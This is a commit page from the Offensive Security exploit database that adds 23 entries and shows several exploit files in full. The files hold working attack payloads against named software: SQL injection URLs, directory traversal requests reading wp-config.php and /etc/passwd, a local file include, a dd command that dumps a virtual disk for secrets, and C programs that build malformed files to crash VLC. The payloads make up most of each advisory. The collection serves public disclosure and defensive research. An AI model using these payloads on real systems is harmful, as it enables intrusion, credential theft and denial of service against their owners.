Skip to content

Commit 855936a

Browse files
author
Offensive Security
committed
DB: 2015-12-13
23 new exploits
1 parent 9139d94 commit 855936a

24 files changed

Lines changed: 461 additions & 0 deletions

files.csv

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35196,3 +35196,26 @@ id,file,description,date,author,platform,type,port
3519635196
38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
3519735197
38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
3519835198
38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
35199+
38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0
35200+
38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability",2013-12-30,"Henri Salo",php,webapps,0
35201+
38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability",2014-01-01,anonymous,linux,local,0
35202+
38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include Vulnerability",2013-12-24,"TUNISIAN CYBER",php,webapps,0
35203+
38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
35204+
38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
35205+
38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal Vulnerability",2013-10-03,"Sisco Barrera",php,webapps,0
35206+
38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload Vulnerability",2014-01-07,"TUNISIAN CYBER",php,webapps,0
35207+
38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35208+
38945,platforms/php/webapps/38945.txt,"Command School Student Management System /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35209+
38946,platforms/php/webapps/38946.txt,"Command School Student Management System /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35210+
38947,platforms/php/webapps/38947.txt,"Command School Student Management System /sw/admin_sgrades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35211+
38948,platforms/php/webapps/38948.txt,"Command School Student Management System /sw/admin_media_codes_1.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35212+
38949,platforms/php/webapps/38949.txt,"Command School Student Management System /sw/admin_infraction_codes.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35213+
38950,platforms/php/webapps/38950.txt,"Command School Student Management System /sw/admin_generations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35214+
38951,platforms/php/webapps/38951.txt,"Command School Student Management System /sw/admin_relations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35215+
38952,platforms/php/webapps/38952.txt,"Command School Student Management System /sw/admin_titles.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35216+
38953,platforms/php/webapps/38953.txt,"Command School Student Management System /sw/health_allergies.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35217+
38954,platforms/php/webapps/38954.txt,"Command School Student Management System /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35218+
38955,platforms/php/webapps/38955.txt,"Command School Student Management System /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35219+
38956,platforms/php/webapps/38956.txt,"Command School Student Management System /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35220+
38957,platforms/php/webapps/38957.html,"Command School Student Management System /sw/admin_change_password.php Admin Password Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
35221+
38958,platforms/php/webapps/38958.html,"Command School Student Management System /sw/add_topic.php Topic Creation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0

platforms/asp/webapps/38935.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/64572/info
2+
3+
CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
CMS Afroditi 1.0 is vulnerable.
8+
9+
http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1

platforms/linux/local/38937.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/64617/info
2+
3+
Apache Libcloud is prone to a local information-disclosure vulnerability.
4+
5+
Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.
6+
7+
Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable.
8+
9+
dd if=/dev/vda bs=1M | strings -n 100 > out.txt

platforms/multiple/dos/38939.c

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
source: http://www.securityfocus.com/bid/64623/info
2+
3+
VLC Media Player is prone to a denial-of-service vulnerability.
4+
5+
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
6+
7+
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
8+
9+
# Exploit Title: VLC v. 1.1.11 .nsv DOS
10+
# Date: 3/14/2012
11+
# Author: Dan Fosco
12+
# Vendor or Software Link: www.videolan.org
13+
# Version: 1.1.11
14+
# Category: local
15+
# Google dork: n/a
16+
# Tested on: Windows XP SP3 (64-bit)
17+
# Demo site: n/a
18+
19+
#include <stdio.h>
20+
21+
int main()
22+
{
23+
FILE *f;
24+
f = fopen("dos.nsv", "w");
25+
fputs("\x4e\x53\x56\x66", f);
26+
fputc('\x00', f);
27+
fputc('\x00', f);
28+
fputc('\x00', f);
29+
fputc('\x00', f);
30+
fclose(f);
31+
return 0;
32+
}
33+
34+
//use code for creating malicious file
35+
36+
edit: works on 2.0.1.0
37+
38+

platforms/multiple/dos/38940.c

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
source: http://www.securityfocus.com/bid/64626/info
2+
3+
VLC Media Player is prone to a denial-of-service vulnerability.
4+
5+
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
6+
7+
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
8+
9+
# Exploit Title: VLC v. 1.1.11 .eac3 DOS
10+
# Date: 3/14/2012
11+
# Author: Dan Fosco
12+
# Vendor or Software Link: www.videolan.org
13+
# Version: 1.1.11
14+
# Category:: local
15+
# Google dork: n/a
16+
# Tested on: Windows XP SP3 (64-bit)
17+
# Demo site: n/a
18+
19+
#include <stdio.h>
20+
21+
int main(int argc, char *argv[])
22+
{
23+
FILE *f;
24+
f = fopen(argv[1], "r+");
25+
fseek(f, 5, SEEK_SET);
26+
fputc('\x00', f);
27+
fclose(f);
28+
return 0;
29+
}
30+
31+
//code updates eac3 file, can find samples on videolan ftp server
32+
33+

platforms/php/webapps/38936.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/64587/info
2+
3+
The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
4+
5+
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
6+
7+
Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php

platforms/php/webapps/38938.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/64619/info
2+
3+
xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
6+
7+
xBoard 5.0, 5.5, and 6.0 are vulnerable.
8+
9+
http://www.example.com/xboard/view.php?post=[LFI]

platforms/php/webapps/38942.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/64693/info
2+
3+
SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
6+
7+
SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected.
8+
9+
https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
10+
https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
11+
https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg

platforms/php/webapps/38943.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/64705/info
2+
3+
The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

platforms/php/webapps/38944.txt

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
source: http://www.securityfocus.com/bid/64707/info
2+
3+
Command School Student Management System is prone to the following security vulnerabilities:
4+
5+
1. Multiple SQL-injection vulnerabilities
6+
2. A cross-site request forgery vulnerability
7+
3. A cross-site scripting vulnerability
8+
4. An HTML injection vulnerability
9+
5. A security-bypass vulnerability
10+
11+
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
12+
13+
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
14+
15+
http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()

0 commit comments

Comments
 (0)